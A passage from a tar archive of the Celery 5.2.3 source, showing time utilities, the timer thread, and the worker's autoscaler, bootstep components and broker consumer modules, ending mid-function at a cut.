@cached_property def local(self): return LocalTimezone() @cached_property def utc(self): return self.get_timezone('UTC') timezone = _Zone() def maybe_timedelta(delta): """Convert integer to timedelta, if argument is an integer.""" if isinstance(delta, numbers.Real): return timedelta(seconds=delta) return delta def delta_resolution(dt, delta): """Round a :class:`~datetime.datetime` to the resolution of timedelta. If the :class:`~datetime.timedelta` is in days, the :class:`~datetime.datetime` will be rounded to the nearest days, if the :class:`~datetime.timedelta` is in hours the :class:`~datetime.datetime` will be rounded to the nearest hour, and so on until seconds, which will just return the original :class:`~datetime.datetime`. """ delta = max(delta.total_seconds(), 0) resolutions = ((3, lambda x: x / 86400), (4, lambda x: x / 3600), (5, lambda x: x / 60)) args = dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second for res, predicate in resolutions: if predicate(delta) >= 1.0: return datetime(*args[:res], tzinfo=dt.tzinfo) return dt def remaining(start, ends_in, now=None, relative=False): """Calculate the remaining time for a start date and a timedelta. For example, "how many seconds left for 30 seconds after start?" Arguments: start (~datetime.datetime): Starting date. ends_in (~datetime.timedelta): The end delta. relative (bool): If enabled the end time will be calculated using :func:`delta_resolution` (i.e., rounded to the resolution of `ends_in`). now (Callable): Function returning the current time and date. Defaults to :func:`datetime.utcnow`. Returns: ~datetime.timedelta: Remaining time. """ now = now or datetime.utcnow() if str(start.tzinfo) == str(now.tzinfo) and now.utcoffset() != start.utcoffset(): # DST started/ended start = start.replace(tzinfo=now.tzinfo) end_date = start + ends_in if relative: end_date = delta_resolution(end_date, ends_in).replace(microsecond=0) ret = end_date - now if C_REMDEBUG: # pragma: no cover print('rem: NOW:{!r} START:{!r} ENDS_IN:{!r} END_DATE:{} REM:{}'.format( now, start, ends_in, end_date, ret)) return ret def rate(r): """Convert rate string (`"100/m"`, `"2/h"` or `"0.5/s"`) to seconds.""" if r: if isinstance(r, str): ops, _, modifier = r.partition('/') return RATE_MODIFIER_MAP[modifier or 's'](float(ops)) or 0 return r or 0 return 0 def weekday(name): """Return the position of a weekday: 0 - 7, where 0 is Sunday. Example: >>> weekday('sunday'), weekday('sun'), weekday('mon') (0, 0, 1) """ abbreviation = name[0:3].lower() try: return WEEKDAYS[abbreviation] except KeyError: # Show original day name in exception, instead of abbr. raise KeyError(name) def humanize_seconds(secs, prefix='', sep='', now='now', microseconds=False): """Show seconds in human form. For example, 60 becomes "1 minute", and 7200 becomes "2 hours". Arguments: prefix (str): can be used to add a preposition to the output (e.g., 'in' will give 'in 1 second', but add nothing to 'now'). now (str): Literal 'now'. microseconds (bool): Include microseconds. """ secs = float(format(float(secs), '.2f')) for unit, divider, formatter in TIME_UNITS: if secs >= divider: w = secs / float(divider) return '{}{}{} {}'.format(prefix, sep, formatter(w), pluralize(w, unit)) if microseconds and secs > 0.0: return '{prefix}{sep}{0:.2f} seconds'.format( secs, sep=sep, prefix=prefix) return now def maybe_iso8601(dt): """Either ``datetime | str -> datetime`` or ``None -> None``.""" if not dt: return if isinstance(dt, datetime): return dt return parse_iso8601(dt) def is_naive(dt): """Return :const:`True` if :class:`~datetime.datetime` is naive.""" return dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None def make_aware(dt, tz): """Set timezone for a :class:`~datetime.datetime` object.""" try: _localize = tz.localize except AttributeError: return dt.replace(tzinfo=tz) else: # works on pytz timezones try: return _localize(dt, is_dst=None) except AmbiguousTimeError: return min(_localize(dt, is_dst=True), _localize(dt, is_dst=False)) def localize(dt, tz): """Convert aware :class:`~datetime.datetime` to another timezone.""" if is_naive(dt): # Ensure timezone aware datetime dt = make_aware(dt, tz) if dt.tzinfo == utc: dt = dt.astimezone(tz) # Always safe to call astimezone on utc zones try: _normalize = tz.normalize except AttributeError: # non-pytz tz return dt else: try: return _normalize(dt, is_dst=None) except TypeError: return _normalize(dt) except AmbiguousTimeError: return min(_normalize(dt, is_dst=True), _normalize(dt, is_dst=False)) def to_utc(dt): """Convert naive :class:`~datetime.datetime` to UTC.""" return make_aware(dt, timezone.utc) def maybe_make_aware(dt, tz=None): """Convert dt to aware datetime, do nothing if dt is already aware.""" if is_naive(dt): dt = to_utc(dt) return localize( dt, timezone.utc if tz is None else timezone.tz_or_local(tz), ) return dt class ffwd: """Version of ``dateutil.relativedelta`` that only supports addition.""" def __init__(self, year=None, month=None, weeks=0, weekday=None, day=None, hour=None, minute=None, second=None, microsecond=None, **kwargs): # pylint: disable=redefined-outer-name # weekday is also a function in outer scope. self.year = year self.month = month self.weeks = weeks self.weekday = weekday self.day = day self.hour = hour self.minute = minute self.second = second self.microsecond = microsecond self.days = weeks * 7 self._has_time = self.hour is not None or self.minute is not None def __repr__(self): return reprcall('ffwd', (), self._fields(weeks=self.weeks, weekday=self.weekday)) def __radd__(self, other): if not isinstance(other, date): return NotImplemented year = self.year or other.year month = self.month or other.month day = min(monthrange(year, month)[1], self.day or other.day) ret = other.replace(**dict(dictfilter(self._fields()), year=year, month=month, day=day)) if self.weekday is not None: ret += timedelta(days=(7 - ret.weekday() + self.weekday) % 7) return ret + timedelta(days=self.days) def _fields(self, **extra): return dictfilter({ 'year': self.year, 'month': self.month, 'day': self.day, 'hour': self.hour, 'minute': self.minute, 'second': self.second, 'microsecond': self.microsecond, }, **extra) def utcoffset(time=_time, localtime=_time.localtime): """Return the current offset to UTC in hours.""" if localtime().tm_isdst: return time.altzone // 3600 return time.timezone // 3600 def adjust_timestamp(ts, offset, here=utcoffset): """Adjust timestamp based on provided utcoffset.""" return ts - (offset - here()) * 3600 def get_exponential_backoff_interval( factor, retries, maximum, full_jitter=False ): """Calculate the exponential backoff wait time.""" # Will be zero if factor equals 0 countdown = min(maximum, factor * (2 ** retries)) # Full jitter according to # https://www.awsarchitectureblog.com/2015/03/backoff.html if full_jitter: countdown = random.randrange(countdown + 1) # Adjust according to maximum wait time and account for negative values. return max(0, countdown) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/timer2.py0000664000175000017500000001131500000000000017075 0ustar00asifasif00000000000000"""Scheduler for Python functions. .. note:: This is used for the thread-based worker only, not for amqp/redis/sqs/qpid where :mod:`kombu.asynchronous.timer` is used. """ import os import sys import threading from itertools import count from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX from time import sleep from kombu.asynchronous.timer import Entry from kombu.asynchronous.timer import Timer as Schedule from kombu.asynchronous.timer import logger, to_timestamp TIMER_DEBUG = os.environ.get('TIMER_DEBUG') __all__ = ('Entry', 'Schedule', 'Timer', 'to_timestamp') class Timer(threading.Thread): """Timer thread. Note: This is only used for transports not supporting AsyncIO. """ Entry = Entry Schedule = Schedule running = False on_tick = None _timer_count = count(1) if TIMER_DEBUG: # pragma: no cover def start(self, *args, **kwargs): import traceback print('- Timer starting') traceback.print_stack() super().start(*args, **kwargs) def __init__(self, schedule=None, on_error=None, on_tick=None, on_start=None, max_interval=None, **kwargs): self.schedule = schedule or self.Schedule(on_error=on_error, max_interval=max_interval) self.on_start = on_start self.on_tick = on_tick or self.on_tick super().__init__() # `_is_stopped` is likely to be an attribute on `Thread` objects so we # double underscore these names to avoid shadowing anything and # potentially getting confused by the superclass turning these into # something other than an `Event` instance (e.g. a `bool`) self.__is_shutdown = threading.Event() self.__is_stopped = threading.Event() self.mutex = threading.Lock() self.not_empty = threading.Condition(self.mutex) self.daemon = True self.name = f'Timer-{next(self._timer_count)}' def _next_entry(self): with self.not_empty: delay, entry = next(self.scheduler) if entry is None: if delay is None: self.not_empty.wait(1.0) return delay return self.schedule.apply_entry(entry) __next__ = next = _next_entry # for 2to3 def run(self): try: self.running = True self.scheduler = iter(self.schedule) while not self.__is_shutdown.is_set(): delay = self._next_entry() if delay: if self.on_tick: self.on_tick(delay) if sleep is None: # pragma: no cover break sleep(delay) try: self.__is_stopped.set() except TypeError: # pragma: no cover # we lost the race at interpreter shutdown, # so gc collected built-in modules. pass except Exception as exc: logger.error('Thread Timer crashed: %r', exc, exc_info=True) sys.stderr.flush() os._exit(1) def stop(self): self.__is_shutdown.set() if self.running: self.__is_stopped.wait() self.join(THREAD_TIMEOUT_MAX) self.running = False def ensure_started(self): if not self.running and not self.is_alive(): if self.on_start: self.on_start(self) self.start() def _do_enter(self, meth, *args, **kwargs): self.ensure_started() with self.mutex: entry = getattr(self.schedule, meth)(*args, **kwargs) self.not_empty.notify() return entry def enter(self, entry, eta, priority=None): return self._do_enter('enter_at', entry, eta, priority=priority) def call_at(self, *args, **kwargs): return self._do_enter('call_at', *args, **kwargs) def enter_after(self, *args, **kwargs): return self._do_enter('enter_after', *args, **kwargs) def call_after(self, *args, **kwargs): return self._do_enter('call_after', *args, **kwargs) def call_repeatedly(self, *args, **kwargs): return self._do_enter('call_repeatedly', *args, **kwargs) def exit_after(self, secs, priority=10): self.call_after(secs, sys.exit, priority) def cancel(self, tref): tref.cancel() def clear(self): self.schedule.clear() def empty(self): return not len(self) def __len__(self): return len(self.schedule) def __bool__(self): """``bool(timer)``.""" return True __nonzero__ = __bool__ @property def queue(self): return self.schedule.queue ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5117517 celery-5.2.3/celery/worker/0000775000175000017500000000000000000000000015471 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/__init__.py0000664000175000017500000000013700000000000017603 0ustar00asifasif00000000000000"""Worker implementation.""" from .worker import WorkController __all__ = ('WorkController',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/autoscale.py0000664000175000017500000001076100000000000020030 0ustar00asifasif00000000000000"""Pool Autoscaling. This module implements the internal thread responsible for growing and shrinking the pool according to the current autoscale settings. The autoscale thread is only enabled if the :option:`celery worker --autoscale` option is used. """ import os import threading from time import monotonic, sleep from kombu.asynchronous.semaphore import DummyLock from celery import bootsteps from celery.utils.log import get_logger from celery.utils.threads import bgThread from . import state from .components import Pool __all__ = ('Autoscaler', 'WorkerComponent') logger = get_logger(__name__) debug, info, error = logger.debug, logger.info, logger.error AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30)) class WorkerComponent(bootsteps.StartStopStep): """Bootstep that starts the autoscaler thread/timer in the worker.""" label = 'Autoscaler' conditional = True requires = (Pool,) def __init__(self, w, **kwargs): self.enabled = w.autoscale w.autoscaler = None def create(self, w): scaler = w.autoscaler = self.instantiate( w.autoscaler_cls, w.pool, w.max_concurrency, w.min_concurrency, worker=w, mutex=DummyLock() if w.use_eventloop else None, ) return scaler if not w.use_eventloop else None def register_with_event_loop(self, w, hub): w.consumer.on_task_message.add(w.autoscaler.maybe_scale) hub.call_repeatedly( w.autoscaler.keepalive, w.autoscaler.maybe_scale, ) def info(self, w): """Return `Autoscaler` info.""" return {'autoscaler': w.autoscaler.info()} class Autoscaler(bgThread): """Background thread to autoscale pool workers.""" def __init__(self, pool, max_concurrency, min_concurrency=0, worker=None, keepalive=AUTOSCALE_KEEPALIVE, mutex=None): super().__init__() self.pool = pool self.mutex = mutex or threading.Lock() self.max_concurrency = max_concurrency self.min_concurrency = min_concurrency self.keepalive = keepalive self._last_scale_up = None self.worker = worker assert self.keepalive, 'cannot scale down too fast.' def body(self): with self.mutex: self.maybe_scale() sleep(1.0) def _maybe_scale(self, req=None): procs = self.processes cur = min(self.qty, self.max_concurrency) if cur > procs: self.scale_up(cur - procs) return True cur = max(self.qty, self.min_concurrency) if cur < procs: self.scale_down(procs - cur) return True def maybe_scale(self, req=None): if self._maybe_scale(req): self.pool.maintain_pool() def update(self, max=None, min=None): with self.mutex: if max is not None: if max < self.processes: self._shrink(self.processes - max) self._update_consumer_prefetch_count(max) self.max_concurrency = max if min is not None: if min > self.processes: self._grow(min - self.processes) self.min_concurrency = min return self.max_concurrency, self.min_concurrency def scale_up(self, n): self._last_scale_up = monotonic() return self._grow(n) def scale_down(self, n): if self._last_scale_up and ( monotonic() - self._last_scale_up > self.keepalive): return self._shrink(n) def _grow(self, n): info('Scaling up %s processes.', n) self.pool.grow(n) def _shrink(self, n): info('Scaling down %s processes.', n) try: self.pool.shrink(n) except ValueError: debug("Autoscaler won't scale down: all processes busy.") except Exception as exc: error('Autoscaler: scale_down: %r', exc, exc_info=True) def _update_consumer_prefetch_count(self, new_max): diff = new_max - self.max_concurrency if diff: self.worker.consumer._update_prefetch_count( diff ) def info(self): return { 'max': self.max_concurrency, 'min': self.min_concurrency, 'current': self.processes, 'qty': self.qty, } @property def qty(self): return len(state.reserved_requests) @property def processes(self): return self.pool.num_processes ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/components.py0000664000175000017500000001653500000000000020242 0ustar00asifasif00000000000000"""Worker-level Bootsteps.""" import atexit import warnings from kombu.asynchronous import Hub as _Hub from kombu.asynchronous import get_event_loop, set_event_loop from kombu.asynchronous.semaphore import DummyLock, LaxBoundedSemaphore from kombu.asynchronous.timer import Timer as _Timer from celery import bootsteps from celery._state import _set_task_join_will_block from celery.exceptions import ImproperlyConfigured from celery.platforms import IS_WINDOWS from celery.utils.log import worker_logger as logger __all__ = ('Timer', 'Hub', 'Pool', 'Beat', 'StateDB', 'Consumer') GREEN_POOLS = {'eventlet', 'gevent'} ERR_B_GREEN = """\ -B option doesn't work with eventlet/gevent pools: \ use standalone beat instead.\ """ W_POOL_SETTING = """ The worker_pool setting shouldn't be used to select the eventlet/gevent pools, instead you *must use the -P* argument so that patches are applied as early as possible. """ class Timer(bootsteps.Step): """Timer bootstep.""" def create(self, w): if w.use_eventloop: # does not use dedicated timer thread. w.timer = _Timer(max_interval=10.0) else: if not w.timer_cls: # Default Timer is set by the pool, as for example, the # eventlet pool needs a custom timer implementation. w.timer_cls = w.pool_cls.Timer w.timer = self.instantiate(w.timer_cls, max_interval=w.timer_precision, on_error=self.on_timer_error, on_tick=self.on_timer_tick) def on_timer_error(self, exc): logger.error('Timer error: %r', exc, exc_info=True) def on_timer_tick(self, delay): logger.debug('Timer wake-up! Next ETA %s secs.', delay) class Hub(bootsteps.StartStopStep): """Worker starts the event loop.""" requires = (Timer,) def __init__(self, w, **kwargs): w.hub = None super().__init__(w, **kwargs) def include_if(self, w): return w.use_eventloop def create(self, w): w.hub = get_event_loop() if w.hub is None: required_hub = getattr(w._conninfo, 'requires_hub', None) w.hub = set_event_loop(( required_hub if required_hub else _Hub)(w.timer)) self._patch_thread_primitives(w) return self def start(self, w): pass def stop(self, w): w.hub.close() def terminate(self, w): w.hub.close() def _patch_thread_primitives(self, w): # make clock use dummy lock w.app.clock.mutex = DummyLock() # multiprocessing's ApplyResult uses this lock. try: from billiard import pool except ImportError: # pragma: no cover pass else: pool.Lock = DummyLock class Pool(bootsteps.StartStopStep): """Bootstep managing the worker pool. Describes how to initialize the worker pool, and starts and stops the pool during worker start-up/shutdown. Adds attributes: * autoscale * pool * max_concurrency * min_concurrency """ requires = (Hub,) def __init__(self, w, autoscale=None, **kwargs): w.pool = None w.max_concurrency = None w.min_concurrency = w.concurrency self.optimization = w.optimization if isinstance(autoscale, str): max_c, _, min_c = autoscale.partition(',') autoscale = [int(max_c), min_c and int(min_c) or 0] w.autoscale = autoscale if w.autoscale: w.max_concurrency, w.min_concurrency = w.autoscale super().__init__(w, **kwargs) def close(self, w): if w.pool: w.pool.close() def terminate(self, w): if w.pool: w.pool.terminate() def create(self, w): semaphore = None max_restarts = None if w.app.conf.worker_pool in GREEN_POOLS: # pragma: no cover warnings.warn(UserWarning(W_POOL_SETTING)) threaded = not w.use_eventloop or IS_WINDOWS procs = w.min_concurrency w.process_task = w._process_task if not threaded: semaphore = w.semaphore = LaxBoundedSemaphore(procs) w._quick_acquire = w.semaphore.acquire w._quick_release = w.semaphore.release max_restarts = 100 if w.pool_putlocks and w.pool_cls.uses_semaphore: w.process_task = w._process_task_sem allow_restart = w.pool_restarts pool = w.pool = self.instantiate( w.pool_cls, w.min_concurrency, initargs=(w.app, w.hostname), maxtasksperchild=w.max_tasks_per_child, max_memory_per_child=w.max_memory_per_child, timeout=w.time_limit, soft_timeout=w.soft_time_limit, putlocks=w.pool_putlocks and threaded, lost_worker_timeout=w.worker_lost_wait, threads=threaded, max_restarts=max_restarts, allow_restart=allow_restart, forking_enable=True, semaphore=semaphore, sched_strategy=self.optimization, app=w.app, ) _set_task_join_will_block(pool.task_join_will_block) return pool def info(self, w): return {'pool': w.pool.info if w.pool else 'N/A'} def register_with_event_loop(self, w, hub): w.pool.register_with_event_loop(hub) class Beat(bootsteps.StartStopStep): """Step used to embed a beat process. Enabled when the ``beat`` argument is set. """ label = 'Beat' conditional = True def __init__(self, w, beat=False, **kwargs): self.enabled = w.beat = beat w.beat = None super().__init__(w, beat=beat, **kwargs) def create(self, w): from celery.beat import EmbeddedService if w.pool_cls.__module__.endswith(('gevent', 'eventlet')): raise ImproperlyConfigured(ERR_B_GREEN) b = w.beat = EmbeddedService(w.app, schedule_filename=w.schedule_filename, scheduler_cls=w.scheduler) return b class StateDB(bootsteps.Step): """Bootstep that sets up between-restart state database file.""" def __init__(self, w, **kwargs): self.enabled = w.statedb w._persistence = None super().__init__(w, **kwargs) def create(self, w): w._persistence = w.state.Persistent(w.state, w.statedb, w.app.clock) atexit.register(w._persistence.save) class Consumer(bootsteps.StartStopStep): """Bootstep starting the Consumer blueprint.""" last = True def create(self, w): if w.max_concurrency: prefetch_count = max(w.max_concurrency, 1) * w.prefetch_multiplier else: prefetch_count = w.concurrency * w.prefetch_multiplier c = w.consumer = self.instantiate( w.consumer_cls, w.process_task, hostname=w.hostname, task_events=w.task_events, init_callback=w.ready_callback, initial_prefetch_count=prefetch_count, pool=w.pool, timer=w.timer, app=w.app, controller=w, hub=w.hub, worker_options=w.options, disable_rate_limits=w.disable_rate_limits, prefetch_multiplier=w.prefetch_multiplier, ) return c ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.523752 celery-5.2.3/celery/worker/consumer/0000775000175000017500000000000000000000000017324 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/__init__.py0000664000175000017500000000060700000000000021440 0ustar00asifasif00000000000000"""Worker consumer.""" from .agent import Agent from .connection import Connection from .consumer import Consumer from .control import Control from .events import Events from .gossip import Gossip from .heart import Heart from .mingle import Mingle from .tasks import Tasks __all__ = ( 'Consumer', 'Agent', 'Connection', 'Control', 'Events', 'Gossip', 'Heart', 'Mingle', 'Tasks', ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/agent.py0000664000175000017500000000101500000000000020771 0ustar00asifasif00000000000000"""Celery + :pypi:`cell` integration.""" from celery import bootsteps from .connection import Connection __all__ = ('Agent',) class Agent(bootsteps.StartStopStep): """Agent starts :pypi:`cell` actors.""" conditional = True requires = (Connection,) def __init__(self, c, **kwargs): self.agent_cls = self.enabled = c.app.conf.worker_agent super().__init__(c, **kwargs) def create(self, c): agent = c.agent = self.instantiate(self.agent_cls, c.connection) return agent ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/connection.py0000664000175000017500000000200200000000000022027 0ustar00asifasif00000000000000"""Consumer Broker Connection Bootstep.""" from kombu.common import ignore_errors from celery import bootsteps from celery.utils.log import get_logger __all__ = ('Connection',) logger = get_logger(__name__) info = logger.info class Connection(bootsteps.StartStopStep): """Service managing the consumer broker connection.""" def __init__(self, c, **kwargs): c.connection = None super().__init__(c, **kwargs) def start(self, c): c.connection = c.connect() info('Connected to %s', c.connection.as_uri()) def shutdown(self, c): # We must set self.connection to None here, so # that the green pidbox thread exits. connection, c.connection = c.connection, None if connection: ignore_errors(connection, connection.close) def info(self, c): params = 'N/A' if c.connection: params = c.connection.info() params.pop('password', None) # don't send password. return {'broker': params} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/consumer.py0000664000175000017500000005436100000000000021542 0ustar00asifasif00000000000000"""Worker Consumer Blueprint. This module contains the components responsible for consuming messages from the broker, processing the messages and keeping the broker connections up and running. """ import errno import logging import os import warnings from collections import defaultdict from time import sleep from billiard.common import restart_state from billiard.exceptions import RestartFreqExceeded from kombu.asynchronous.semaphore import DummyLock from kombu.exceptions import ContentDisallowed, DecodeError from kombu.utils.compat import _detect_environment from kombu.utils.encoding import safe_repr from kombu.utils.limits import TokenBucket from vine import ppartial, promise from celery import bootsteps, signals from celery.app.trace import build_tracer from celery.exceptions import (CPendingDeprecationWarning, InvalidTaskError, NotRegistered) from celery.utils.functional import noop from celery.utils.log import get_logger from celery.utils.nodenames import gethostname from celery.utils.objects import Bunch from celery.utils.text import truncate from celery.utils.time import humanize_seconds, rate from celery.worker import loops from celery.worker.state import (active_requests, maybe_shutdown, reserved_requests, task_reserved) __all__ = ('Consumer', 'Evloop', 'dump_body') CLOSE = bootsteps.CLOSE TERMINATE = bootsteps.TERMINATE STOP_CONDITIONS = {CLOSE, TERMINATE} logger = get_logger(__name__) debug, info, warn, error, crit = (logger.debug, logger.info, logger.warning, logger.error, logger.critical) CONNECTION_RETRY = """\ consumer: Connection to broker lost. \ Trying to re-establish the connection...\ """ CONNECTION_RETRY_STEP = """\ Trying again {when}... ({retries}/{max_retries})\ """ CONNECTION_ERROR = """\ consumer: Cannot connect to %s: %s. %s """ CONNECTION_FAILOVER = """\ Will retry using next failover.\ """ UNKNOWN_FORMAT = """\ Received and deleted unknown message. Wrong destination?!? The full contents of the message body was: %s """ #: Error message for when an unregistered task is received. UNKNOWN_TASK_ERROR = """\ Received unregistered task of type %s. The message has been ignored and discarded. Did you remember to import the module containing this task? Or maybe you're using relative imports? Please see http://docs.celeryq.org/en/latest/internals/protocol.html for more information. The full contents of the message body was: %s """ #: Error message for when an invalid task message is received. INVALID_TASK_ERROR = """\ Received invalid task message: %s The message has been ignored and discarded. Please ensure your message conforms to the task message protocol as described here: http://docs.celeryq.org/en/latest/internals/protocol.html The full contents of the message body was: %s """ MESSAGE_DECODE_ERROR = """\ Can't decode message body: %r [type:%r encoding:%r headers:%s] body: %s """ MESSAGE_REPORT = """\ body: {0} {{content_type:{1} content_encoding:{2} delivery_info:{3} headers={4}}} """ TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS = """\ Task %s cannot be acknowledged after a connection loss since late acknowledgement is enabled for it. Terminating it instead. """ CANCEL_TASKS_BY_DEFAULT = """ In Celery 5.1 we introduced an optional breaking change which on connection loss cancels all currently executed tasks with late acknowledgement enabled. These tasks cannot be acknowledged as the connection is gone, and the tasks are automatically redelivered back to the queue. You can enable this behavior using the worker_cancel_long_running_tasks_on_connection_loss setting. In Celery 5.1 it is set to False by default. The setting will be set to True by default in Celery 6.0. """ # noqa: E501 def dump_body(m, body): """Format message body for debugging purposes.""" # v2 protocol does not deserialize body body = m.body if body is None else body return '{} ({}b)'.format(truncate(safe_repr(body), 1024), len(m.body)) class Consumer: """Consumer blueprint.""" Strategies = dict #: Optional callback called the first time the worker #: is ready to receive tasks. init_callback = None #: The current worker pool instance. pool = None #: A timer used for high-priority internal tasks, such #: as sending heartbeats. timer = None restart_count = -1 # first start is the same as a restart class Blueprint(bootsteps.Blueprint): """Consumer blueprint.""" name = 'Consumer' default_steps = [ 'celery.worker.consumer.connection:Connection', 'celery.worker.consumer.mingle:Mingle', 'celery.worker.consumer.events:Events', 'celery.worker.consumer.gossip:Gossip', 'celery.worker.consumer.heart:Heart', 'celery.worker.consumer.control:Control', 'celery.worker.consumer.tasks:Tasks', 'celery.worker.consumer.consumer:Evloop', 'celery.worker.consumer.agent:Agent', ] def shutdown(self, parent): self.send_all(parent, 'shutdown') def __init__(self, on_task_request, init_callback=noop, hostname=None, pool=None, app=None, timer=None, controller=None, hub=None, amqheartbeat=None, worker_options=None, disable_rate_limits=False, initial_prefetch_count=2, prefetch_multiplier=1, **kwargs): self.app = app self.controller = controller self.init_callback = init_callback self.hostname = hostname or gethostname() self.pid = os.getpid() self.pool = pool self.timer = timer self.strategies = self.Strategies() self.conninfo = self.app.connection_for_read() self.connection_errors = self.conninfo.connection_errors self.channel_errors = self.conninfo.channel_errors self._restart_state = restart_state(maxR=5, maxT=1) self._does_info = logger.isEnabledFor(logging.INFO) self._limit_order = 0 self.on_task_request = on_task_request self.on_task_message = set() self.amqheartbeat_rate = self.app.conf.broker_heartbeat_checkrate self.disable_rate_limits = disable_rate_limits self.initial_prefetch_count = initial_prefetch_count self.prefetch_multiplier = prefetch_multiplier # this contains a tokenbucket for each task type by name, used for # rate limits, or None if rate limits are disabled for that task. self.task_buckets = defaultdict(lambda: None) self.reset_rate_limits() self.hub = hub if self.hub or getattr(self.pool, 'is_green', False): self.amqheartbeat = amqheartbeat if self.amqheartbeat is None: self.amqheartbeat = self.app.conf.broker_heartbeat else: self.amqheartbeat = 0 if not hasattr(self, 'loop'): self.loop = loops.asynloop if hub else loops.synloop if _detect_environment() == 'gevent': # there's a gevent bug that causes timeouts to not be reset, # so if the connection timeout is exceeded once, it can NEVER # connect again. self.app.conf.broker_connection_timeout = None self._pending_operations = [] self.steps = [] self.blueprint = self.Blueprint( steps=self.app.steps['consumer'], on_close=self.on_close, ) self.blueprint.apply(self, **dict(worker_options or {}, **kwargs)) def call_soon(self, p, *args, **kwargs): p = ppartial(p, *args, **kwargs) if self.hub: return self.hub.call_soon(p) self._pending_operations.append(p) return p def perform_pending_operations(self): if not self.hub: while self._pending_operations: try: self._pending_operations.pop()() except Exception as exc: # pylint: disable=broad-except logger.exception('Pending callback raised: %r', exc) def bucket_for_task(self, type): limit = rate(getattr(type, 'rate_limit', None)) return TokenBucket(limit, capacity=1) if limit else None def reset_rate_limits(self): self.task_buckets.update( (n, self.bucket_for_task(t)) for n, t in self.app.tasks.items() ) def _update_prefetch_count(self, index=0): """Update prefetch count after pool/shrink grow operations. Index must be the change in number of processes as a positive (increasing) or negative (decreasing) number. Note: Currently pool grow operations will end up with an offset of +1 if the initial size of the pool was 0 (e.g. :option:`--autoscale=1,0 `). """ num_processes = self.pool.num_processes if not self.initial_prefetch_count or not num_processes: return # prefetch disabled self.initial_prefetch_count = ( self.pool.num_processes * self.prefetch_multiplier ) return self._update_qos_eventually(index) def _update_qos_eventually(self, index): return (self.qos.decrement_eventually if index < 0 else self.qos.increment_eventually)( abs(index) * self.prefetch_multiplier) def _limit_move_to_pool(self, request): task_reserved(request) self.on_task_request(request) def _schedule_bucket_request(self, bucket): while True: try: request, tokens = bucket.pop() except IndexError: # no request, break break if bucket.can_consume(tokens): self._limit_move_to_pool(request) continue else: # requeue to head, keep the order. bucket.contents.appendleft((request, tokens)) pri = self._limit_order = (self._limit_order + 1) % 10 hold = bucket.expected_time(tokens) self.timer.call_after( hold, self._schedule_bucket_request, (bucket,), priority=pri, ) # no tokens, break break def _limit_task(self, request, bucket, tokens): bucket.add((request, tokens)) return self._schedule_bucket_request(bucket) def _limit_post_eta(self, request, bucket, tokens): self.qos.decrement_eventually() bucket.add((request, tokens)) return self._schedule_bucket_request(bucket) def start(self): blueprint = self.blueprint while blueprint.state not in STOP_CONDITIONS: maybe_shutdown() if self.restart_count: try: self._restart_state.step() except RestartFreqExceeded as exc: crit('Frequent restarts detected: %r', exc, exc_info=1) sleep(1) self.restart_count += 1 try: blueprint.start(self) except self.connection_errors as exc: # If we're not retrying connections, no need to catch # connection errors if not self.app.conf.broker_connection_retry: raise if isinstance(exc, OSError) and exc.errno == errno.EMFILE: raise # Too many open files maybe_shutdown() if blueprint.state not in STOP_CONDITIONS: if self.connection: self.on_connection_error_after_connected(exc) else: self.on_connection_error_before_connected(exc) self.on_close() blueprint.restart(self) def on_connection_error_before_connected(self, exc): error(CONNECTION_ERROR, self.conninfo.as_uri(), exc, 'Trying to reconnect...') def on_connection_error_after_connected(self, exc): warn(CONNECTION_RETRY, exc_info=True) try: self.connection.collect() except Exception: # pylint: disable=broad-except pass if self.app.conf.worker_cancel_long_running_tasks_on_connection_loss: for request in tuple(active_requests): if request.task.acks_late and not request.acknowledged: warn(TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS, request) request.cancel(self.pool) else: warnings.warn(CANCEL_TASKS_BY_DEFAULT, CPendingDeprecationWarning) def register_with_event_loop(self, hub): self.blueprint.send_all( self, 'register_with_event_loop', args=(hub,), description='Hub.register', ) def shutdown(self): self.blueprint.shutdown(self) def stop(self): self.blueprint.stop(self) def on_ready(self): callback, self.init_callback = self.init_callback, None if callback: callback(self) def loop_args(self): return (self, self.connection, self.task_consumer, self.blueprint, self.hub, self.qos, self.amqheartbeat, self.app.clock, self.amqheartbeat_rate) def on_decode_error(self, message, exc): """Callback called if an error occurs while decoding a message. Simply logs the error and acknowledges the message so it doesn't enter a loop. Arguments: message (kombu.Message): The message received. exc (Exception): The exception being handled. """ crit(MESSAGE_DECODE_ERROR, exc, message.content_type, message.content_encoding, safe_repr(message.headers), dump_body(message, message.body), exc_info=1) message.ack() def on_close(self): # Clear internal queues to get rid of old messages. # They can't be acked anyway, as a delivery tag is specific # to the current channel. if self.controller and self.controller.semaphore: self.controller.semaphore.clear() if self.timer: self.timer.clear() for bucket in self.task_buckets.values(): if bucket: bucket.clear_pending() reserved_requests.clear() if self.pool and self.pool.flush: self.pool.flush() def connect(self): """Establish the broker connection used for consuming tasks. Retries establishing the connection if the :setting:`broker_connection_retry` setting is enabled """ conn = self.connection_for_read(heartbeat=self.amqheartbeat) if self.hub: 